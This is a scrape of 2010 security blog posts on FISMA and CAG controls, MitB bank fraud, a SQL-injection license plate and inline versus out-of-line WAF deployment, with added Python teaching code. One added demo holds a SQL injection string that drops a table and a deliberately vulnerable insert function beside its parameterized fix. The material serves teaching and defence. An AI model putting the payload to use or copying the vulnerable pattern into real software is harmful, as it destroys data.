</span><span class="blsp-spelling-error" id="SPELLING_ERROR_16"><span class="Apple-style-span" style="font-size: medium;">Paller</span></span><span class="Apple-style-span" style="font-size: medium;"> stated in his testimony:</span></div><div></div><blockquote><div><i><span class="Apple-style-span" style="font-size: medium;">Both the guidance for implementing </span><span class="blsp-spelling-error" id="SPELLING_ERROR_17"><span class="Apple-style-span" style="font-size: medium;">FISMA</span></span><span class="Apple-style-span" style="font-size: medium;"> and the guidance for auditing </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">compliance are focusing on out of date, ineffective defenses. What we need instead </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">is a process that directs agencies to focus their </span><span class="blsp-spelling-error" id="SPELLING_ERROR_18"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span><span class="Apple-style-span" style="font-size: medium;"> security resources on </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">monitoring their information systems and networks in real time so that they can </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">prevent, detect and/or mitigate damage from attacks as they occur. 
And oversight </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">must be focused on the effectiveness of the agencies’ real‐time defenses.</span></i></span></i></span></i></span></i></span></i></span></i></span></i></div></blockquote><div></div><div><span class="Apple-style-span" style="font-size: medium;">The CAG list is much more up-to-date, not only with the current attack methodologies of advanced persistent threats (APT) but also because it includes critical audit components such as which metrics should be captured and how to test the effectiveness of the controls. One example taken from the CAG is </span><a href="http://www.sans.org/critical-security-controls/control.php?id=7"><span class="Apple-style-span" style="font-size: medium;">Control 7: Application Software Security</span></a><span class="Apple-style-span" style="font-size: medium;">, which lists specific, operational controls for web applications such as:</span></div><div><span class="Apple-style-span" style=" line-height: 17px; font-family:'trebuchet ms', verdana, sans-serif;"><blockquote><h4 style="padding-top: 15px; padding-right: 2px; padding-bottom: 4px; padding-left: 2px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 87, 125); font-family: 'trebuchet ms', sans-serif; "><i><span class="Apple-style-span" style="font-size: medium;">How can this control be implemented, automated, and its effectiveness measured?</span></i></h4><ol style="list-style-image: none; "><li style="padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px; "><i><span class="Apple-style-span" style="font-size: medium;">QW: Organizations should protect web applications by deploying web application firewalls that inspect all traffic flowing to the web application for common web application attacks, including but not limited to Cross-Site Scripting, SQL injection, command injection, and directory traversal attacks. For applications that are not web based, deploy specific application firewalls if such tools are available for the given application type.</span></i></li></ol></blockquote></span></div><div></div></span></div><blockquote><div><span class="Apple-style-span" style="font-family:arial;"><div><i><span class="Apple-style-span" style="font-size: medium;"><br /></span></i></div></span></div></blockquote><span class="Apple-style-span" style="font-family:arial;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.whitehatsec.com/home/resource/whitepapers/graphics/WAF_averagetimetofix.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 422px; height: 217px;" src="http://www.whitehatsec.com/home/resource/whitepapers/graphics/WAF_averagetimetofix.png" border="0" alt="" /></a><span class="Apple-style-span" style="font-size: medium;"><br /><br />Again, web application firewalls can be used as a tactical remediation tool to help organizations reduce their time-to-fix metric for identified vulnerabilities by acting as a virtual patch (or compensating control, as specified in Control 7 of the CAG). The graphic on the right is taken from </span><a href="http://www.whitehatsec.com/home/resource/stats.html"><span class="Apple-style-span" style="font-size: medium;">WhiteHat Security's Statistics Report</span></a><span class="Apple-style-span" style="font-size: medium;"> and it tracks the average time to fix each class of vulnerability, measured in days. As you can see, most of these issues aren't resolved for months. The CAG, on the other hand, recommends the following remediation time:</span></span><div><span class="Apple-style-span" style=" line-height: 17px; "><i><blockquote><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Additionally, all high-risk vulnerabilities in Internet-accessible web applications identified by web application vulnerability scanners, static analysis tools, and automated database configuration review tools must be mitigated (by either fixing the flaw or through implementing a compensating control) </span><b><span class="Apple-style-span" style="font-size: medium;">within fifteen days</span></b><span class="Apple-style-span" style="font-size: medium;"> of discovery of the flaw.</span></span></blockquote></i></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">WAFs can help to close the gap between the remediation time recommended by the CAG and the time it normally takes an organization to implement source-code-level changes in production. These kinds of continuous monitoring and agile response capabilities are a key component of defense, and it is good news that the government is looking to ensure FISMA includes them.</span></span></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-69841137655805396072010-03-23T09:44:00.006-04:002010-03-30T10:37:01.689-04:00Hackers Targeting Commercial Online Bank Accounts<a href="http://2.bp.blogspot.com/_E0YEPhKPc2k/S6jGgfz2A7I/AAAAAAAAAGI/H5C4lailchk/s1600-h/bank_robbery.gif"><img id="BLOGGER_PHOTO_ID_5451825610529047474" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 300px; CURSOR: hand; HEIGHT: 300px" alt="" src="http://2.bp.blogspot.com/_E0YEPhKPc2k/S6jGgfz2A7I/AAAAAAAAAGI/H5C4lailchk/s400/bank_robbery.gif" border="0" /></a> <em>Submitted by Ryan Barnett 3/23/2010</em><br /><div></div><br /><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">There have been a number of stories in the past few months that outline a growing trend among cyber-criminals: targeting the online banking accounts of businesses. 
As the cartoon on the right shows, stealing money from online banks is an optimal choice for savvy </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">-criminals as the </span></span><span class="blsp-spelling-corrected" id="SPELLING_ERROR_2"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">yield</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> is potentially very high and the risk of physical harm associated with attempting to rob a brick-and-mortar bank is removed. </span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><i> </i></span></span></div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Two such stories come from </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_3"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">ComputerWorld</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> and outline how two companies had money </span></span><span class="blsp-spelling-corrected" id="SPELLING_ERROR_4"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">transferred</span></span></span><span 
class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> out of their accounts to foreign countries. The first one tells how </span></span><a href="http://www.computerworld.com/s/article/9153598/Poughkeepsie_N.Y._slams_bank_for_378_000_online_theft"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">the TD Bank account of the town of </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_5"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Poughkeepsie</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">, NY </span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">was breached by hackers and approximately $378,000 was transferred out of the account. 
The other example describes how </span></span><a href="http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Plano, TX-based Hillary Machinery Inc. had approximately $800,000 </span></span><span class="blsp-spelling-corrected" id="SPELLING_ERROR_6"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">transferred</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> from its </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_7"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">PlainsCapital</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> online account</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">.</span></span></div><div> </div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">So, how were the </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_8"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">-criminals able to obtain access to these online bank accounts? Details are scarce; however, it appears that the criminals used valid credentials. 
A likely source would be a Man-in-the-browser (</span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_9"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">MitB</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">) type of attack from something like </span></span><a href="http://blog.threatexpert.com/2009/09/time-to-revisit-zeus-almighty.html"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Zeus</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">, which infects client computers, monitors web activity, and can steal and even manipulate web data. Brian Krebs from the Washington Post has been following these trending stories for about 9 months now, and this </span></span><a href="http://www.krebsonsecurity.com/2010/03/ebanking-victim-take-a-number/#more-1522"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">blog post seems to corroborate the attack method</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> of MitB types of malware stealing banking credentials.</span></span></div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">From a web application defense perspective, since the attackers used legitimate credentials during the transactions, other types of fraud/anomaly detection mechanisms should be employed. 
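One way to implement such a check, as an added example rather than anything from the post or from a bank: each transfer is scored against what the bank already knows about the account (home country, countries its users log in from, typical amount), and a matching password is deliberately not a factor; the account profile, thresholds and transfers are constructed sample data.

```python
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class AccountProfile:
    """What the bank already knows about a business account (constructed fields)."""
    account_id: str
    home_country: str          # country where the business banks
    usual_countries: Set[str]  # countries its users have logged in from historically
    typical_amount: float      # a typical outbound transfer for this account, in USD


@dataclass
class Transfer:
    """One outbound transfer request, seen by the application after a successful login."""
    account_id: str
    session_country: str       # geolocated country of the client IP holding the session
    dest_country: str          # country of the beneficiary's bank
    amount: float              # USD


def score_transfer(t: Transfer, p: AccountProfile) -> List[str]:
    """Return the red flags for one transfer (an empty list means nothing anomalous).

    Whether the password matched is not an input here: a MitB trojan riding a
    legitimate session passes the credential check, so the transfer has to be
    judged on where it comes from and what it does.
    """
    flags = []
    if t.session_country not in p.usual_countries:
        flags.append("session_origin_unusual:" + t.session_country)
    if t.dest_country != p.home_country:
        flags.append("destination_overseas:" + t.dest_country)
    if t.amount >= 10 * p.typical_amount:
        flags.append("amount_outsized")
    return flags


def decide(flags: List[str]) -> str:
    """Assumed policy: two or more flags hold the transfer for out-of-band
    confirmation (a call to a number on file), one flag alerts, none allows."""
    if len(flags) >= 2:
        return "hold_for_out_of_band_verification"
    if flags:
        return "alert"
    return "allow"


def review(transfers: List[Transfer], profiles: Dict[str, AccountProfile]) -> List[str]:
    """Run every transfer through the scoring and return one decision per transfer."""
    return [decide(score_transfer(t, profiles[t.account_id])) for t in transfers]


# Constructed sample: a municipal account that banks in the US, whose staff have
# only ever logged in from the US, with a typical transfer of a few thousand dollars.
PROFILES = {
    "town-001": AccountProfile("town-001", "US", {"US"}, 5000.0),
}

SAMPLE_TRANSFERS = [
    Transfer("town-001", "US", "US", 4200.0),    # routine domestic transfer
    Transfer("town-001", "IT", "RO", 90000.0),   # session from Italy, money to Romania, 18x typical
    Transfer("town-001", "US", "CA", 3000.0),    # domestic session, foreign beneficiary, normal size
]

if __name__ == "__main__":
    for t, d in zip(SAMPLE_TRANSFERS, review(SAMPLE_TRANSFERS, PROFILES)):
        print(f"{t.session_country}->{t.dest_country} ${t.amount:,.0f}: {d}")
```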
In both example incidents, the fact that these transactions were initiated from computers in other countries (</span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_10"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Italy</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">/Romania) and transferring money to overseas accounts should have raised some sort of red flags.</span></span></div><div> </div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Bottom line - users must take extra precautions when accessing online banking accounts, such as not using the standard web browser they use for everyday web surfing and instead using a sandboxed web browser session (in an application such as </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">VMware</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">).</span></span></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-38177732544782172662010-03-22T15:07:00.007-04:002010-03-22T16:48:37.838-04:00Applications vs. 
Automobiles<a href="http://4.bp.blogspot.com/_E0YEPhKPc2k/S6fB8CGapUI/AAAAAAAAAGA/uKZ0UPCeQqU/s1600-h/SQL_Injection_Plate.jpg"><img id="BLOGGER_PHOTO_ID_5451539111055369538" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 296px" alt="" src="http://4.bp.blogspot.com/_E0YEPhKPc2k/S6fB8CGapUI/AAAAAAAAAGA/uKZ0UPCeQqU/s400/SQL_Injection_Plate.jpg" border="0" /></a> <div><em>Submitted by Ryan Barnett 03/22/2010</em></div><div></div><br /><div>A funny picture was sent to me through our PR team at <a href="http://www.schwartz-pr.com/">Schwartz Communications</a> that made me chuckle. I am sure you have seen <a href="http://auto.howstuffworks.com/car-driving-safety/safety-regulatory-devices/red-light-camera.htm">traffic light cameras that automatically take photos of the cars that do not obey traffic lights</a>. Well, this photo shows how someone was attempting to abuse the fact that most of these cameras are integrated with computers and presumably back-end databases to automatically generate traffic violation tickets. By placing an SQL query on the front bumper where the license plate would normally reside, the driver of this car may be able not only to evade receiving a ticket but also to delete the entire "tablice" table. 
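As an added illustration (not code from the post), here is the ticketing-database defect the bumper is aimed at beside its fix: the plate reading is untrusted input, so it must reach the query as a bound parameter rather than as SQL text, with a plate-format check as a second layer; the table name comes from the post, while the readings, columns and plate format are constructed.

```python
import re
import sqlite3

# Constructed plate readings, as a camera's OCR step might hand them to the
# ticketing back end. The second mimics the bumper in the photo: text meant
# for the SQL parser rather than for a human.
PLATE_OK = "ZU 0666"
PLATE_HOSTILE = "ZU 0666', '2010-03-22'); DROP TABLE tablice; --"

# Assumed plate format for the validation layer; not something the post specifies.
PLATE_RE = re.compile(r"[A-Z]{1,3} ?[0-9]{3,5}")


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the ticketing database, with the "tablice" table from the post."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE tablice (plate TEXT NOT NULL, seen_at TEXT NOT NULL);"
        "INSERT INTO tablice VALUES ('AB 1234', '2010-03-21');"
    )
    return conn


def record_vulnerable(conn: sqlite3.Connection, plate: str, seen_at: str) -> None:
    """The defect: the reading is pasted into the statement text, and the driver call
    allows stacked statements (executescript stands in for database APIs that do)."""
    conn.executescript(f"INSERT INTO tablice VALUES ('{plate}', '{seen_at}');")


def record_parameterized(conn: sqlite3.Connection, plate: str, seen_at: str) -> None:
    """The fix: the reading travels as a bound parameter, never as SQL text, so
    whatever was painted on the bumper is stored literally and nothing else runs."""
    conn.execute("INSERT INTO tablice VALUES (?, ?)", (plate, seen_at))
    conn.commit()


def validate_plate(plate: str) -> bool:
    """Defense in depth at the edge: a reading that is not shaped like a plate is
    not a plate. Parameterization is what actually stops the injection."""
    return PLATE_RE.fullmatch(plate) is not None


def table_exists(conn: sqlite3.Connection) -> bool:
    row = conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = 'tablice'"
    ).fetchone()
    return row is not None


def stored_plates(conn: sqlite3.Connection) -> list:
    return [r[0] for r in conn.execute("SELECT plate FROM tablice ORDER BY rowid")]


def demo() -> dict:
    """Run the hostile reading through both code paths, each on its own database."""
    vuln = fresh_db()
    record_vulnerable(vuln, PLATE_HOSTILE, "2010-03-22")
    safe = fresh_db()
    record_parameterized(safe, PLATE_HOSTILE, "2010-03-22")
    return {
        "vulnerable_table_survives": table_exists(vuln),        # False: the table is gone
        "parameterized_table_survives": table_exists(safe),     # True
        "parameterized_rows": stored_plates(safe),              # hostile text stored as a plain string
        "hostile_passes_validation": validate_plate(PLATE_HOSTILE),
        "ok_passes_validation": validate_plate(PLATE_OK),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```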
</div><div></div><div> </div><div>This scenario clearly indicates a growing trend - <strong><em>the inter-connectedness between applications and automobiles.</em></strong></div><div></div><div> </div><div>Another news story that echoes this trend is found in a recent <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database"><span class="blsp-spelling-error" id="SPELLING_ERROR_0">WASC</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_1">WHID</span></a> <a href="http://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?embed=false&filter33485=&filter33487=2010-2">entry</a> where an attacker was able to hack into his former employer's web application that communicated with systems installed on leased cars. This <span class="blsp-spelling-corrected" id="SPELLING_ERROR_2">software</span> was able to either prevent cars from starting or force the car horn to beep repeatedly if the car's lease payment went past due. The hacker not only destroyed account data but also caused 100+ cars not to start and their horns to sound off.</div><div></div><div>These impacts are fairly harmless, but there is an undercurrent of concern that this inter-connectedness between online applications and our physical world is actually quite fragile and must be protected from abuse. </div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-44475850168378766402010-03-16T10:07:00.012-04:002010-03-16T16:16:01.390-04:00Inline vs. 
Out-of-Line WAF Deployments<span style="font-style: italic;">Submitted by Ryan Barnett 03/16/2010</span><br /><br /><span style="font-family:arial;">There was an article that just came out today entitled "</span><a style="font-family: arial;" href="http://www.itweb.co.za/index.php?option=com_content&view=article&id=31317:top-considerations-for-selecting-web-application-firewall-technology&catid=86:computing&Itemid=64&tmpl=component&print=1">Top considerations for selecting Web Application Firewall technology</a><span style="font-family:arial;">" that I had to comment on. First of all, the title is misleading, as a more accurate title would have been "</span><span style="font-style: italic; font-weight: bold;font-family:arial;" >Proxy vs. Non-Proxy based WAF deployment models</span><span style="font-family:arial;">" as the article highlights why they think that a proxy-based WAF deployment is superior to non-proxy ones. Is this really the case? It depends. Each WAF deployment is different based on the use case. Are you going to use it for virtual patching, http audit logging, tracking sensitive data, application DoS or App Defect identification? All of these scenarios are different, and they don't always require an inline, proxy-based deployment model.</span><br /><br /><span style="font-family:arial;">It is also important to note that there are hybrid deployment modes available for WAFs which include deploying sensors out-of-line to gather data and then communicating with agent applications installed on specific, individual web servers. The advantage of this approach is that for many large networks, they may only want to use an inline approach for some web applications without incurring the latency hit to other applications. 
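To make the hybrid model concrete, here is an added example (my code, not Breach Security's or any vendor's) of the kind of excessive access rate detection an out-of-line sensor can run on mirrored traffic: requests are counted per username, SessionID and client IP over a sliding window, and the verdict is either a TCP reset from the sensor or a local block by the agent on the affected web server; the thresholds and request records are constructed.

```python
from collections import defaultdict, deque
from typing import Dict, List, Optional, Tuple

# Assumed thresholds, (max requests, window seconds), per granularity.
# Illustrative values, not any product's defaults.
DEFAULT_THRESHOLDS: Dict[str, Tuple[int, int]] = {
    "username": (3, 60),   # one application account
    "session": (8, 60),    # one SessionID cookie
    "ip": (10, 60),        # one client address
}

Hit = Tuple[str, str, int]  # (granularity, key, requests seen in window)


class AccessRateDetector:
    """Sliding-window request counter that an out-of-line sensor can run on
    mirrored traffic. Each request is counted at every granularity it carries
    and reported at each one whose threshold it exceeds, most specific first."""

    def __init__(self, thresholds: Dict[str, Tuple[int, int]] = DEFAULT_THRESHOLDS):
        self.thresholds = thresholds
        self.windows = {g: defaultdict(deque) for g in thresholds}

    def observe(self, ts: int, ip: str, session: Optional[str], username: Optional[str]) -> List[Hit]:
        keys = {"username": username, "session": session, "ip": ip}
        hits: List[Hit] = []
        for gran in ("username", "session", "ip"):
            key = keys[gran]
            if key is None or gran not in self.thresholds:
                continue
            limit, window = self.thresholds[gran]
            q = self.windows[gran][key]
            q.append(ts)
            while q[0] <= ts - window:   # drop timestamps that fell out of the window
                q.popleft()
            if len(q) > limit:
                hits.append((gran, key, len(q)))
        return hits


def choose_action(hits: List[Hit], agent_on_host: bool) -> Optional[Tuple[str, str, str]]:
    """An out-of-line sensor cannot drop the request it is looking at: it can alert,
    send a TCP reset for the offending key, or in the hybrid model hand the verdict
    to an agent on that web server, which then blocks locally."""
    if not hits:
        return None
    gran, key, _count = hits[0]   # most specific granularity that tripped
    return (gran, key, "block_at_agent" if agent_on_host else "tcp_reset")


def sample_requests() -> List[Tuple[int, str, Optional[str], Optional[str]]]:
    """Constructed request records: (timestamp, client ip, SessionID, username)."""
    recs = []
    for i in range(5):    # one client repeatedly submitting the login form for one account
        recs.append((100 + 2 * i, "203.0.113.5", None, "alice"))
    for i in range(12):   # one logged-in session pulling pages far faster than a person reads
        recs.append((200 + i, "198.51.100.7", "s1", None))
    return recs


def replay(records, thresholds=DEFAULT_THRESHOLDS, agent_on_host: bool = False):
    """Feed records through one detector; return (ts, granularity, key, action) per flagged request."""
    det = AccessRateDetector(thresholds)
    flagged = []
    for ts, ip, session, username in records:
        verdict = choose_action(det.observe(ts, ip, session, username), agent_on_host)
        if verdict:
            flagged.append((ts,) + verdict)
    return flagged


if __name__ == "__main__":
    for row in replay(sample_requests()):
        print(row)
```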
</span><br /><br /><span style="font-family:arial;">Keep in mind that this article was written by Evolution PR who represents WAF vendor Barracuda Networks - </span><span style="font-weight: bold; font-style: italic;font-family:arial;" >who does not offer an out-of-line/non-proxy based WAF solution</span><span style="font-family:arial;">. This makes it a bit more clear as to why they are trying to pitch proxy-based WAF as the only real solution. Breach Security's WebDefend appliance can be deployed in both out-of-line and inline modes so I am not promoting one over the other due to commercial interests. My aim here is to provide counterpoints to the data presented in this article. Let's look at the issues highlighted in more depth.</span><br /><p style="font-weight: bold; font-family: arial;">1. Cloaking</p><blockquote style="font-style: italic; font-family: arial;"><p>Hackers gather information in order to launch an attack on a Web server by trying to simulate error conditions on a Web site. Often, the resultant error messages expose information about the Web server, application server, or the database being used. This information is then used to launch a full-scale attack on the Web infrastructure.</p><p>A proxy-based WAF intercepts the response from the back-end server and forwards it to the client only if it is not an error. If the response is an error, the WAF can suppress the response containing debugging information and send out a custom response. The WAF also removes headers such as server banners, which can be used to identify servers.</p></blockquote><span style="font-family:arial;">The WASC Web Application Firewall Evaluation Criteria (WAFEC) document lists several alternative </span><a style="font-family: arial;" href="http://webappsec.pbworks.com/f/wasc-wafec-v1.0.html#N103B9">protection techniques</a><span style="font-family:arial;"> that can be employed. 
In this section, the article is mainly talking about detailed error leakage prevention, which isn't really what is considered web application cloaking. Cloaking involves attempting to obscure or remove tell-tale signs of the web application technology in use. These include encrypting or signing Cookies, URLs and parameter data to prevent tampering. While this is certainly a sexy concept, it runs into issues in practice, mainly due to the dynamic nature of today's web applications. </span><span style="font-weight: bold; font-style: italic;font-family:arial;" >Accurately parsing outbound response bodies in order to accurately identify/update/sign/encrypt all possible parameter data is not easy.</span><span style="font-family:arial;"> You can thank AJAX, Flash, etc. for that. It is for this reason that behavioral profiling of inbound application usage is key. </span><br /><br /><span style="font-weight: bold;font-family:arial;" >2. Input validation</span><p face="arial"></p><blockquote style="font-style: italic; font-family: arial;"><p>A WAF should secure applications where the incoming traffic may be encrypted or encoded using a non-standard character encoding.</p><p>A proxy based WAF decrypts and normalises data before running various types of checks, in order to ensure that no attacks are smuggled inside of encrypted or encoded packets. It also offers multiple ways of securing inputs - such as encrypting or digitally signing cookies to prevent against cookie tampering attacks. It can also recognise which fields are read-only or hidden and ensure that these fields are not altered. For other fields, it should offer a host of protection mechanisms such as checking for various attacks on the input fields and locking down those inputs based on data type, such as numeric or alpha numeric.</p><p>Non-proxy based WAFs do not provide effective input validation. 
Although some can encrypt and normalise data, because they are not proxy-based they are not able to enforce rules on individual form parameters passed to the application. They also cannot encrypt or digitally sign the application cookie; relying instead on signature matching for security.</p></blockquote><p face="arial"></p><p style="font-family: arial;">Where to start with this section... First of all, <span style="font-weight: bold; font-style: italic;">the deployment model in use (inline vs. out-of-line) has absolutely nothing to do with the WAF's input validation capabilities</span>. WAFs can do application profiling/learning and automatically create a positive security profile for URLs+Parameter payloads whether they are proxy-based or not. It is important to note, however, that there is a difference between detection and blocking. This section seems to indicate that non-proxy based WAFs cannot detect these types of attacks and enforce input validation, and this is not true. Once a violation of the learned profile occurs, if you want the WAF to block, then of course an inline WAF can block the request locally.<br /></p><p style="font-weight: bold; font-family: arial;">3. 
Data theft protection</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>Proxy based WAFs intercept outbound data, so they can be configured to ensure that sensitive data - like credit card numbers - are either masked or altogether blocked to protect data leakage.</p><p>This is only possible because the proxy-based WAF sits in line with the application server and secures data on both incoming and outgoing paths - so this is not offered by non-proxy based WAFs.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">Proxy based WAFs do have one advantage when it comes to outbound data handling, and that is if the user wants to actually change data on the fly to mask or delete sensitive data and still serve the response to the client. Again, while this sounds like a great concept, there are issues in the real world. One specific issue I have seen is a WAF sanitizing data going outbound, which then caused problems with the processing of subsequent requests because the sanitized data was used within hidden fields. Remember my point from item #1 above in this regard: accurate parsing of outbound data is oftentimes difficult, so properly sanitizing data is challenging as well.<br /></p><p style="font-weight: bold; font-family: arial;">4. Protect against application layer DOS attacks</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>There are many ways of launching an application layer denial of service attack. Web applications maintain state information - such as the number of items in a shopping cart - with the help of sessions, which require some memory resources on the Web servers. By forcing a Web server to create thousands of session leads, memory resources are locked up and this results in performance degradation and can lead to a server crash.</p><p>There are other ways these attacks can be done. 
The WAF should be able to control the rate at which requests reach the Web server, and track the rate of session creation. This is only possible with a system that proxies on behalf of the Web or application server.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">Again - not true. Out-of-Line WAFs are also able to do rate-limiting and identify potential DoS scenarios. Breach Security's WebDefend appliance has Excessive Access Rate Detection capabilities which allow the user to set appropriate <a href="http://projects.webappsec.org/Insufficient+Anti-automation">Anti-Automation</a> rate-limiting thresholds to prevent brute force, scraping and DoS attacks. In an earlier blog post I also outlined how a WAF can <a href="http://tacticalwebappsec.blogspot.com/2009/10/identifying-denial-of-service.html">Identify DoS Conditions through Performance Monitoring</a>, which helps to identify stealthy attacks that aim to open http connections and then sit idle and tie up processes. Under all of these circumstances, the issue is not about detection but about how you are going to react when these attacks are identified. WAFs can choose to issue TCP resets based on increasing granularity: IP addresses, SessionIDs, or specific application usernames. If your site is under a heavy DDoS attack, it is usually appropriate to take evasive action and actually push the IP blocking out to a network security device at the edge of your network.</p><p style="font-weight: bold; font-family: arial;">5. Centralised security enforcement</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>The ability to enforce all security policies from a single control point allows for simplified operations and infrastructure. 
To ensure safer and more efficient security administration, it is advisable that controlling and enforcing attack prevention, privacy (SSL cryptography) and AAA (Authentication, Authorisation, Accounting) policy is done through a single control point.</p><p>Because a non-proxy WAF does not terminate TCP connections, it does not have the ability to request credentials from incoming users, issue cookies upon successful credential exchange, redirect sessions to particular destinations, or restrict particular users to particular resources. Proxy-based solutions, on the other hand, have the capability to be an AAA authority - or to fully integrate with existing AAA infrastructure.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">Centralization of authentication/authorization mechanisms is great from a management perspective, but it isn't always appropriate from a WAF perspective. Most web applications handle user authentication themselves and are managed by different business units. Forget about WAFs for a minute: centralizing web application account administration is a large undertaking in its own right, not something to start simply because you are going to implement a WAF. Where this makes sense is if/when you create more of a portal environment and you want to then broker requests to different internal business units.<br /></p><p style="font-weight: bold; font-family: arial;">6. Control the response</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>Because of the wide range of security violations, it is important that the administrator is able to respond to threats differently. 
